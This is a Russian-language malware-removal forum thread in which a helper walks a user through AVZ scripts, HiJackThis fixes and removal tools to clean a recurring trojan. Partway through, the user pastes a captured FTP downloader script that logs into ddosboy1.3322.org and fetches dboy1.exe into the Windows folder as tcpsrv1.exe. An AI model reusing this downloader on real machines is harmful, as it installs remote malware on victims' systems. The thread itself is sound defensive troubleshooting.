Пользуюсь антивирусником AntiVir
Каждый день с частотой два раза в сутки у меня появляется такое сообщение:

http://ncesoftware.com/archive/dboy1.gif

Я его всегда удаляю.
Изначально файрвол ругался что этот файл пытается создать cmd.com. Как выяснил это тоже вирус. Который я успешно удалил(надеюсь) - вычистил реестр от всех записей и почистил винт. Больше этот файл (cmd.com) не появляется. В реестре поиск на это слово уже ничего не даёт. Но вот файл dboy1.sys всё равно продолжается создаваться. Ну как узнать откуда он лезит как его заблочить? А то на протяжении двух недель уже это порядком под надоело.

Я прошу прощения что не ознакомился с инструкцией... завтра всё зделаю

Наконец-то добрался до логов, зделал как по инструкции.

hijackthis.zip (http://ncesoftware.com/archive/info/hijackthis.zip)
virusinfo_syscheck.zip (http://ncesoftware.com/archive/info/virusinfo_syscheck.zip)
virusinfo_syscure.zip (http://ncesoftware.com/archive/info/virusinfo_syscure.zip)

Если где-то ошибся, то поправте, переделаю.

Есть у кого какие предположения, что это такое?

p.s. UnlockerHook.dll до установки этой программы сообщение о трояне появлялось а программу (Unlocker) поставил что-бы при удалении файлов занятых каким то процессом не надо было перегружать комп, очень выручает, не думаю что дело в ней.

у меня постоянно в system32 появляются файлы dboy.bat и dboy.sys причём они текстовые
сколько не пробывал удалять бесполезно, ну и окошко в первом посте... чтоб его....

кто нибудь выручайте...

Modnyi_Keks, здравствуйте. Антивирус и файервол надо было отключать, по логам они у вас работают (и драйвера и службы)
AskSBar (D:\Program Files\AskSBar) деинсталируйте.
Запустите AVZ, далее в меню файл - выполнить скрипт, выделите и скопируйте текст ниже в окно выполнения скрипта AVZ, временно выключите антивирус, firewall и другое защитное программное обеспечение (http://www.bleepingcomputer.com/forums/topic114351.html), в т.ч. SpybotSD TeaTimer, отключите интернет (или включите временно брандмауэр windows), нажмите кнопку «Запустить».
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
SetServiceStart('WinHost32Svr', 4);
SetServiceStart('WinSpoolSvc', 4);
SetServiceStart('obvious', 4);
SetServiceStart('sysdrv32', 4);
QuarantineFile('D:\Program Files\AskSBar\SrchAstt\1.bin\A2SRCHAS.DLL','');
QuarantineFile('D:\Program Files\Real Desktop\Real Desktop.exe','');
QuarantineFile('D:\WINDOWS\system32\cssdll32.dll','');
QuarantineFile('D:\WINDOWS\system32\drivers\sysdrv32.sys','');
QuarantineFile('D:\WINDOWS\system32\DRIVERS\obvious.sys','');
QuarantineFile('WinSpoolSvc.sys','');
QuarantineFile('D:\WINDOWS\security\svchost.exe','');
QuarantineFile('d:\program files\tray2.final\tray.exe','');
DeleteFile('D:\WINDOWS\security\svchost.exe');
DeleteFile('WinSpoolSvc.sys');
DeleteFile('D:\WINDOWS\system32\DRIVERS\obvious.sys');
DeleteFile('D:\WINDOWS\system32\drivers\sysdrv32.sys');
DeleteFile('D:\Program Files\AskSBar\SrchAstt\1.bin\A2SRCHAS.DLL');
DeleteService('WinHost32Svr');
DeleteService('obvious');
DeleteService('WinSpoolSvc');
DeleteService('sysdrv32');
DelBHO('{0579B4B1-0293-4d73-B02D-5EBB0BA0F0A2}');
BC_ImportDeletedList;
ExecuteSysClean;
BC_DeleteFile('D:\WINDOWS\system32\drivers\sysdrv32.sys');
BC_DeleteFile('D:\WINDOWS\system32\DRIVERS\obvious.sys');
BC_DeleteFile('D:\WINDOWS\security\svchost.exe');
BC_DeleteSvc('WinHost32Svr');
BC_DeleteSvc('obvious');
BC_DeleteSvc('WinSpoolSvc');
BC_DeleteSvc('sysdrv32');
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится. После перезагрузки выполнить ещё скрипт
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
Файл quarantine.zip отправьте на user15802[at]mail.ru, в письме укажите ссылку на тему
Удалите папку D:\Program Files\AskSBar\
Обновите Java Runtime Environment (JRE) (http://java.sun.com/javase/downloads/index.jsp)
Скачайте JavaRA (http://raproducts.org/) здесь (http://raproducts.org/click/click.php?id=1) или здесь (http://prm753.bchea.org/javara.zip)
Распакуйте, запустите, выберите "Remove Older Versions",
Далее нажмите "Search For Updates", выберите "Update Using Sun Java's Website" и "Open Webpage"
Альтернативный вариант - после удаления старой версии скачайте и установите последнюю версию Java Runtime Environment (JRE) (http://java.sun.com/javase/downloads/index.jsp) с сайта производителя.
С помощью cureit и/или AVPTool проверку проводили?
Отключите антивирус и файервол и повторите логи virusinfo_syscheck.zip (2-ой стандартный скрипт AVZ) и hijackthis

Я отключал антивирусник и файрвол из автозагрузки, не думал что надо было и службы отключить. Кстати, лучше уточните, это в инструкции, что службы тоже нужно отключить. Т.к. я сразу, честно говоря, не додумался.

Обновлять Java Runtime Environment обязательно? После форматирования винчестера я поставил новый билд но всё равно потом админ удалил и поставил "наш" апдейт. Не знаю почему, не спрашивал. Можно ли этот пункт пропустить?

Modnyi_Keks, здесь (http://www.bleepingcomputer.com/forums/topic114351.html) есть инструкции как выключить защитное ПО на англ., зато с картинками, из автозагрузки убирать не требуется, службы отключать тоже, достаточно чтобы антивирусный монитор и другие защитные компоненты (напр. для некоторых защита реестра и пр.) не работали, для Avira достаточно статуса "Antivir Guard disable" в трее (зонтик в трее свернут), Teatimer выключать необходимо, запустив Spybot S&D и переключившись в Advanced Mode,
Обновления JRE можете пропустить, но старые версии имеют уязвимости. Админ ставит "ваш" апдейт видимо из-за того, что требуется какой-то программе, которая с обновленной версией JRE работает некорректно (в таком случае лучше обновлять программу, иначе это угроза безопасности как клиентов, так и самой информационной системе).

Новые:
hijackthis.zip (http://ncesoftware.com/archive/info/hijackthis.zip)
virusinfo_syscheck.zip (http://ncesoftware.com/archive/info/virusinfo_syscheck.zip)
virusinfo_syscure.zip (http://ncesoftware.com/archive/info/virusinfo_syscure.zip)

Выключал именно так как было указано в инструкции.

проверял cureit-ом говорит всё чисто, однако файлы cmd.com, dboy.sys dboy.bat, и уже dboy1.sys как положено лежат в директории system32. Кстати вот к примеру файл dboy1.sys - его содержимое:


open ddosboy1.3322.org
dboy
dboy
if
if
get dboy1.exe C:\\Windows\\tcpsrv1.exe
get dboy1.exe C:\\Windows\\tcpsrv1.exe
bye
bye


наверно меня и спасло что винду я поставил не на С как обычно, а на D. Да и файла нет такого tcpsrv1.exe. Хоть что-то.

Удалил эти файлы... надолго ли...

Modnyi_Keks, virusinfo_syscure.zip - лог старый выложили.
Файлы из карантина ушли в вирлаб, D:\Program Files\Real Desktop\Real Desktop.exe в карантин не попал, можете поискать вручную и проверить на virustotal.com, если Real Desktop.exe окажется чистым, то по новым логам hijackthis и virusinfo_syscheck чисто, файлов cmd.com, dboy.sys dboy.bat,dboy1.sys и Windowstcpsrv1.exe в логах не видно.
Запустите HiJackThis (http://www.trendsecure.com/portal/en-US/_download/HiJackThis.exe), нажмите кнопку "Do a system scan only", в открывшемся окне поставьте галочки напротив указанных строк и нажмите кнопку "Fix Checked".
R3 - URLSearchHook: (no name) - {0579B4B6-0293-4d73-B02D-5EBB0BA0F0A2} - (no file)
Скачайте SDFix (http://downloads.andymanchesta.com/RemovalTools/SDFix.exe), загрузитесь в безопасном режиме, запустите утилиту (запустить RunThis.bat - подтвердить, нажав "Y"), после окончания сканирования скопируйте (Ctrl+A, Ctrl+C) текст из C:\Report.txt и вставьте (Ctrl+V) в следующее сообщение, если текст не уместится в одном сообщении, продолжите его в следующем или запакуйте файл C:\Report.txt и прикрепите к сообщению
Описание SDFix есть здесь (http://www.saule-spb.ru/library/sdfix.html) или здесь (http://www.spyware-ru.com/sdfix/)

Скачайте Malwarebytes' Anti-Malware здесь (http://malwarebytes.gt500.org/mbam-setup.exe), здесь (http://www.besttechie.net/mbam/mbam-setup.exe), здесь (http://www.malwaresupport.com/mbam/program/mbam-setup.exe) или здесь (http://download.bleepingcomputer.com/malwarebytes/mbam-setup.exe). Установите, обновите базы, выберите Perform Full Scan (Провести полную проверку), нажмите Scan (Проверить), после сканирования выберите Ок и далее Show Results (Показать результаты), нажмите "Remove Selected" (Удалить выделенные). После удаления откройте лог и скопируйте в сообщение. Логи сканирования можно посмотреть во вкладке Logs (Отчеты), выбрав отчет и нажав кнопку Open (Открыть).

Скачайте ComboFix здесь (http://subs.geekstogo.com/ComboFix.exe), здесь (http://download.bleepingcomputer.com/sUBs/ComboFix.exe) или здесь (http://www.forospyware.com/sUBs/ComboFix.exe) и сохраните на рабочий стол.
Установите Recovery Console по инструкции (на англ.яз) - how-to-use-combofix (http://www.bleepingcomputer.com/combofix/how-to-use-combofix) и здесь (http://support.microsoft.com/kb/310994) - скачайте установочный файл для своей ОС (например Windows XP с пакетом обновления 2 (SP2) (http://support.microsoft.com/kb/310994#) - для Windows XP SP3 использовать этот же файл) на рабочий стол, закройте все остальные приложения и мышкой перенесите установочный файл на иконку ComboFix и установите Microsoft Recovery Console. Доп. см. Программа для Windows XP Professional с пакетом обновления 2 (SP2): Установочные диски для установки с гибкого диска (http://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=535d248d-5e10-49b5-b80c-0a0205368124).
После установки консоли восстановления программа предложит запустить сканирование, подтвердите, нажав Yes.
Когда процесс сканирования завершится, скопируйте (Ctrl+A, Ctrl+C) текст из C:\ComboFix.txt и вставьте (Ctrl+V) в следующее сообщение если текст не уместится в одном сообщении, продолжите его в следующем или запакуйте файл C:\ComboFix.txt и прикрепите к сообщению.
Внимание! Перед запуском сканирования обязательно закройте все браузеры, временно выключите антивирус, firewall и другое защитное программное обеспечение (http://www.bleepingcomputer.com/forums/topic114351.html). Не запускайте других программ во время работы Combofix и не нажимайте кнопки мыши. Combofix может отключить интернет через некоторое время после запуска, не переподключайте интернет пока Combofix не завершит работу. Если интернет не появился после окончания работы Combofix, перезагрузите компьютер.
Как использовать ComboFix - how-to-use-combofix (http://www.bleepingcomputer.com/combofix/how-to-use-combofix) (на англ.яз.) и здесь (http://www.spyware-ru.com/combofix/) (на русском)

D:\Program Files\Real Desktop\Real Desktop.exe »

У меня такой папки нет, и я вообще не могу поиском найти нечто подобное на real desktop.exe
Может в каком нибудь system32, однако там тоже пошарил поиском ничего не нашлось, пробывал разные варианты, это что за файл? Какое точное имя файла?

Какое точное имя файла? »
По логу есть в автозагрузке, Real Desktop.exe в папке D:\Program Files\Real Desktop\

странно но этой программы нет, и после проверок ничего не удалял. Кстати после выполнения скрипта прошло 3 дня и окно с трояном больше не появляется, да и файлов пока тоже этих нет.
После НГ уже всё остальное доделаю.

Modnyi_Keks, значит можно почистить реестр, выполните в AVZ скрипт
begin
DeleteFile('D:\Program Files\Real Desktop\Real Desktop.exe');
ExecuteSysClean;
end.
или запустите HiJackThis, нажмите кнопку "Do a system scan only", в открывшемся окне поставьте галочки напротив указанных строк и нажмите кнопку "Fix Checked".
O4 - HKCU\..\Run: [Real Desktop] "D:\Program Files\Real Desktop\Real Desktop.exe"